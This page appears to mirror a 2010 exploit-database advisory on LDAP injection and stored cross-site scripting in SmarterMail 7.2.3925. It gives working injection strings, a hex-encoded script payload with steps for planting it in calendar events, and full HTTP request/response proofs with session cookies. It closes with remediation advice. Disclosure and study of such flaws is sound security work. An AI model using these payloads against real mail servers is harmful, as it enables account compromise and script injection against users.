Skip to content
cyberexploits
webappasptext

SmarterMail 7.x (7.2.3925) - LDAP Injection

SmarterMail 7.x (7.2.3925) - LDAP Injection

Publié le 2010-10-02

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/asp/webapps/15189.txt7eac4c3a
raw
########################################################################

# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)

# Date: 2010-10-01

# Author : David Hoyt (sqlhacker) – Hoyt LLC

# Contact : h02332@gmail.com

# Home : http://cloudscan.me

# Dork : insite: SmarterMail Enterprise 7.2

# Bug : LDAP Injection + Cross Site Scripting (STORED)

# Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2

# Uncoordinated Disclosure

########################################################################



ABSTRACT

--------------------------

It is important for application developers to penetration test

their products prior to release in order to find potential vulnerabilities

and correct them before fraudsters exploit them.



DISCLOSURE PURPOSE

--------------------------

Applications for wide-scale deployment must be delivered with an exploit

surface that is manageable.



Developers failing to properly screen applications prior to release are at

risk of uncoordinated disclosure.



SECURITY COMMENTS

--------------------------

Server Application developers should explicitly be detailing the exploit

surface

modeling performed on an application as part of the software development

lifecycle

prior to and as part of a candidate release.



System Admins need to take a trust-no-one approach when installing Server

and Client Applications for wide-scale deployment.



ENGAGEMENT TOOLS

--------------------------

I am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit,

NeXpose, XSS_Rays,

FuzzDB as a baseline set of engagement tools that are being used to perform

this analysis.



This is manual testing.



DISCUSSION AND ANALYSIS

--------------------------

SmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have

addressed a number of

issues identified in CVE's 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425

and

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486



There were a number of Private Advisories provided to Hoyt LLC Clients that

were not disclosed to the public. It was our assumption that

the level of detail and specificity would have resulted in a thourough

scrubbing of any patches and release candidates.



There are additional exploits to disclose that use a manual, multi-step

process to confirm with picture proof.



This advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS

Injection vulnerabilities found in SmarterMail 7.x (7.2.3925).

Additional advisories will be released as we develop a bullet proof audit

trail.



Further advisories will focus on security by obscurity in SmarterMail.



My prior work focused on the URL/Parameter Combos that would deliver a Cross

Site Scripting (STORED) exploit.



My review seeks to focus on the identified URL/Param combos in SmarterMail

7.1 that were found to be vulnerable but not disclosed to the public

and only available in private advisories to our clients and partners.





AUDIT TRAIL + EXPLOIT PATTERN EXAMPLES





EXPLOIT #1

--------------------------

LDAP injection and resulting STORED Cross Site Scripting in Events Planner -

SmarterMail 7.x (7.2.3925)



Summary

Severity:   High

Confidence:   Certain

Host:   http://vulnerable.smartermail.site:9998

Path:   /Main/frmEmptyPreviewOuter.aspx

        Multiple Related URL/Parameters (available in private advisory)



Issue detail

The type parameter is vulnerable to LDAP injection attacks.



The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each

submitted in the type parameter. These two requests resulted in different

responses, indicating that the input may be being incorporated into a

disjunctive LDAP query in an unsafe manner.



Issue Background

-----------------------

LDAP injection arises when user-controllable data is copied in an unsafe way

into an LDAP query that is performed by the application. If an attacker can

inject LDAP metacharacters into the query, then they can interfere with the

query's logic. Depending on the function for which the query is used, the

attacker may be able to retrieve sensitive data to which they are not

authorised, or subvert the application's logic to perform some unauthorised

action.



Note that automated difference-based tests for LDAP injection flaws can

often be unreliable and are prone to false positive results.



The author has manually reviewed the reported requests and responses and

confirmed a vulnerability is present.



All the work presented is manual recon and analysis using the tools listed.





Step by Step Process

---------------------------------------------------



The steps to create the exploit as as follows:



-Obtain an end-user SmarterMail 7.x (7.2.3925)

-Login to WebMail, Click Events



Note - The XSS attack payload can be delivered by creating an Event Group or

an Event Name.



My example will create a new event. I know that SmarterMail does some data

sanitization, so I need to test various encoding schemes to get around the

limited sanity checking.



To make this easy to follow along, use URL http://ha.ckers.org/xss.html for

our encoding calculator so the average Joe can leverage this exploit

example.



I want to make a simple test to confirm if the URL/Parameters are vulnerable

in the Event Planner of SmarterMail 7.x (7.2.3925).

I'll use a known malicious payload example. Using the encoding calculator, I

input <\\\/script>alert(0x000170)<\\/script>

and for the HEX Value Stored Cross Site Scripting exploit I want to create.



The result is

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E,

there is your example exploit for Stored XSS.



Take the result and paste it into the new event name (exploit) you want to

create and e-mail around to all your colleages and friends and blog about...



Click submit and refresh the screen, here is what I "received" for a

payload. I provide 2 examples of URL/Parameter manipulation that result in

an event being created.



** Author Note.. the Blogger parser isn't very good about making me escape

the nasty XSS below.. so I have to edit the post so readers don't get

XSS'd.. Pictures are a part of the exploit surface model, I also like to

post conclusive, picture proof of an exploit.



The picture(s) below provide conclusive evidence of Cross Site Scripting

(STORED) delivered via LDAP Injection.





Stored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x

(7.2.3925)

LDAP Injection to leverage an XSS attack utilizing the event planner

features of SmarterMail 7.x (7.2.3925)





Stored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x

(7.2.3925)

LDAP Injection to leverage an XSS attack utilizing the event planner

features of SmarterMail 7.x (7.2.3925)



The implication here is that SmarterMail isn't defending against HEX Value

malicious payloads. This is a "critical" exploit finding confirmed in

SmarterMail 7.x (7.2.3925).

You can keep testing with Decimal or Base 64 and produce results equal to

and likely greater than what I am showing here in public, emphasis on

greater than what I am showing.





Issue Remediation

-------------------

If possible, applications should avoid copying user-controllable data into

LDAP queries. If this is unavoidable, then the data should be strictly

validated to prevent LDAP injection attacks. In most situations, it will be

appropriate to allow only short alphanumeric strings to be copied into

queries, and any other input should be rejected. At a minimum, input

containing any LDAP metacharacters should be rejected; characters that

should be blocked include ( ) ; , * | & = and whitespace.





EXPLOIT Proof of Concept {PoC} - DETAILS

--------------------------------------------



Request 1

GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,

application/x-ms-application, application/x-ms-xbap,

application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://vulnerable.smartermail.site:9998/Default.aspx

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;

Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Accept-Encoding: gzip, deflate

Host: vulnerable.smartermail.site:9998

Proxy-Connection: Keep-Alive

Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;

settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;

STTTState=;

STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}







Response 1

HTTP/2.0 200 OK

Server: SmarterTools/2.0.3925.24451

Date: Fri, 01 Oct 2010 22:28:00 GMT

X-AspNet-Version: 2.0.50727

X-Compressed-By: HttpCompress

Cache-Control: private

Content-Type: text/html; charset=utf-8

Connection: Close

Content-Length: 5204





...[SNIP]...

<![CDATA[

UpdateSidebarCounts('UserSync', 0);

$(function() { if (parent.UpdateCurrentPage)

parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a');

});

Sys.Application.initialize();

$(function() {

SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');

});

//]]>

</script>

</form>

</body>

</html>







Request 2

GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,

application/x-ms-application, application/x-ms-xbap,

application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://vulnerable.smartermail.site:9998/Default.aspx

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;

Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Accept-Encoding: gzip, deflate

Host: vulnerable.smartermail.site:9998

Proxy-Connection: Keep-Alive

Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;

settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;

STTTState=;

STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}







Response 2

HTTP/2.0 200 OK

Server: SmarterTools/2.0.3925.24451

Date: Fri, 01 Oct 2010 22:28:00 GMT

X-AspNet-Version: 2.0.50727

X-Compressed-By: HttpCompress

Cache-Control: private

Content-Type: text/html; charset=utf-8

Connection: Close

Content-Length: 5247





...[SNIP]...

<![CDATA[

UpdateSidebarCounts('UserEmail', 0);

UpdateSidebarCounts('UserSync', 0);

$(function() { if (parent.UpdateCurrentPage)

parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a');

});

Sys.Application.initialize();

$(function() {

SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');

});

//]]>







EXPLOIT #2

--------------------------

Directory Creation by Fuzzing that results in a STORED Cross Site Scripting

attack.



This portion of the research focused on creating direcories that would evade

the current filtering techniques used my SmarterMail to prevent OS Injection







WORKAROUNDS

--------------------------

Specifically, URL filtering should be employed against the malicious query

strings.







REMEDIATION SOLUTION

------------------------



I'm pushing a quick update to my clients now on this LDAP Injection / Stored

XSS issue..

Our group is studying a remediation solution or additional workarounds that

will be posted at this URL.



Calender and Event functionality is not straightforward to implement

securely.

Some recommendations to consider in the design of this functionality

include:



Validating Input and a blacklist of strings to hinder this style of attack.



There is more to the story.. since I'm just screening applications for

clients, I am pushing out the info as I confirm it manually.

Voir sur GitHub